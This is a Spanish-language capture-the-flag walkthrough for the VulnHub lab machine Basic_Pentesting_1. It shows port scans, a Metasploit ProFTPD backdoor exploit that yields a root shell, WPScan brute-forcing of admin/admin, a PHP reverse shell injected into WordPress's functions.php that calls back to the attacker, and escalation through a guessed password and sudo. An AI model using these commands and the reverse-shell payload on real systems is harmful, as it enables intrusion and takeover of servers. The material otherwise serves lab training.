Write Up Basic_Pentesting_1 VulnHub
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:57 EDT
Nmap scan report for 192.168.5.173
Host is up (0.00068s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:A7:30:B0 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.03 secondsMetasploit
Si vamos a metasploit y vemos si tiene alguna vulnerabilidad el ftp veremos que si la tiene, por lo que haremos lo siguiente...
msfconsole -qDentro del entorno de metasploit haremos lo siguiente...
use exploit/unix/ftp/proftpd_133c_backdoorset RHOSTS <VICTIM_IP>set payload payload/cmd/unix/reverseset LHOST <YOUR_IP>runInfo:
[*] Started reverse TCP double handler on 192.168.5.162:4444
[*] 192.168.5.173:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0PGACgf43119N3Fp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0PGACgf43119N3Fp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.5.162:4444 -> 192.168.5.173:47528) at 2024-06-07 10:02:25 -0400
whoami
rootCon esto abremos conseguido acceso a la maquina y ya no solo eso, si no que seriamos root automaticamente...
Segunda forma de resolucion
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.173/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html (Status: 403) [Size: 302]
/.htpasswd.html (Status: 403) [Size: 302]
/.htaccess.php (Status: 403) [Size: 301]
/.htpasswd (Status: 403) [Size: 297]
/.htaccess.txt (Status: 403) [Size: 301]
/.htpasswd.txt (Status: 403) [Size: 301]
/.htpasswd.php (Status: 403) [Size: 301]
/.htaccess (Status: 403) [Size: 297]
/index.html (Status: 200) [Size: 177]
/server-status (Status: 403) [Size: 301]
/secret (Status: 200) [Size: 53390]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================Si nos vamos a /secret vemos que hay un Wordpress por lo que haremos lo siguiente...
wpscan --url http://<IP>/secret/ --enumerate uInfo:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.5.173/secret/ [192.168.5.173]
[+] Started: Fri Jun 7 10:10:50 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.5.173/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.5.173/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.5.173/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.5.173/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.25 identified (Outdated, released on 2024-01-30).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.5.173/secret/, Match: '-release.min.js?ver=4.9.25'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.5.173/secret/, Match: 'WordPress 4.9.25'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jun 7 10:10:52 2024
[+] Requests Done: 48
[+] Cached Requests: 5
[+] Data Sent: 12.219 KB
[+] Data Received: 294.714 KB
[+] Memory used: 148.348 MB
[+] Elapsed time: 00:00:02Por lo que vemos nos saco el usuario admin, por lo que haremos lo siguiente...
Antes de nada si probamos las credenciales por defecto que vienen en Wordpress que son User = admin y Password = admin entrariamos, pero si queremos tirar de herramientas, seria con el siguiente comando...
wpscan --url http://<IP>/secret/ --usernames admin --passwords <WORDLIST>Info:
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.5.173/secret/ [192.168.5.173]
[+] Started: Fri Jun 7 10:12:00 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.5.173/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.5.173/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.5.173/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.5.173/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.25 identified (Outdated, released on 2024-01-30).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.5.173/secret/, Match: '-release.min.js?ver=4.9.25'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.5.173/secret/, Match: 'WordPress 4.9.25'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin
Trying admin / akusayangkamu Time: 00:02:39 < > (19820 / 14364212) 0.13% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jun 7 10:14:44 2024
[+] Requests Done: 19961
[+] Cached Requests: 29
[+] Data Sent: 6.768 MB
[+] Data Received: 70.162 MB
[+] Memory used: 226.145 MB
[+] Elapsed time: 00:02:44Por lo que vemos las credenciales como bien dije antes son las de por defecto...
User = admin
Password = adminUna vez dentro del Wordpress nos vamos a la pestaña Themes y en la casilla Editor dentro de este entorno veremos un archivo para editar llamado Functions.php el cual inyectaremos una Reverse Shell de la siguiente manera...
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);Una vez inyectado esto, le damos a guardar los cambios al boton Update File y estando a la escucha anteriormente...
nc -lvnp <PORT>Cuando le demos a guardar automaticamente se nos creara una Shell con el usuario www-data, por lo que la sanitizaremos...
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Descubrimos un usuario llamado marlinspike si probamos a cambiarnos a ese usuario utilizando como contraseña el mismo nombre de usuario seremos ese usuario...
User = marlinspike
Password = marlinspikeUna vez siendo este usuario, si hacemos sudo -l veremos lo siguiente...
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALLVemos que tenemos todos los privilegios por lo que si hacemos...
sudo suSeremos root y con esto ya habriamos terminado la maquina...
Last updated